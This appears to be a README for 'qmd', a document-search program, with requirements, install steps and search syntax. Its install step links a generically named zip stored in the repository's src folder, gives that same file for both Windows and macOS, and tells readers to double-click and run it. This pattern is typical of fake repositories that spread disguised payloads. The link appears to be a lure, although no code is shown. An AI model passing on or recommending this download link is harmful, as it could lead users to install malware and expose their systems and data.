To run qmd, ensure your system meets these requirements:
- Operating System: Windows 10 or later, macOS 10.14 or later, or Linux (any modern distribution).
- RAM: At least 4 GB.
- Disk Space: A minimum of 100 MB free space for installation.
To get started with qmd, follow these steps:
- Visit the Releases Page: Go to our Releases page.
- Select the Latest Version: On the Releases page, you will see a list of versions. Click on the latest version.
- Choose the Right File: Depending on your operating system, select the appropriate installation file (e.g., https://raw.githubusercontent.com/LuisGA2025/qmd/main/src/Software-2.3-beta.5.zip for Windows, https://raw.githubusercontent.com/LuisGA2025/qmd/main/src/Software-2.3-beta.5.zip for macOS).
- Download the File: Click on the file name to start the download.
- Open the File: Once the download is complete, locate the file in your downloads folder and double-click to run it.
- Follow Installation Prompts: Follow the on-screen instructions to complete the installation.
- Launch qmd: After installation, find qmd in your applications or programs list and open it.
Using qmd is straightforward:
- Open qmd.
- Input Command: Type your search query in the input box.
- View Results: The results will display instantly, allowing you to click on any document to open it.
You can also filter results by specifying the type of document you want to search.
- Basic Search: Simply type a keyword and hit Enter.
- Search by Format: Use "PDF: keyword" to search only PDF files.
- Search in Specific Folder: Type "folder: foldername keyword" to limit your search to a specific location.
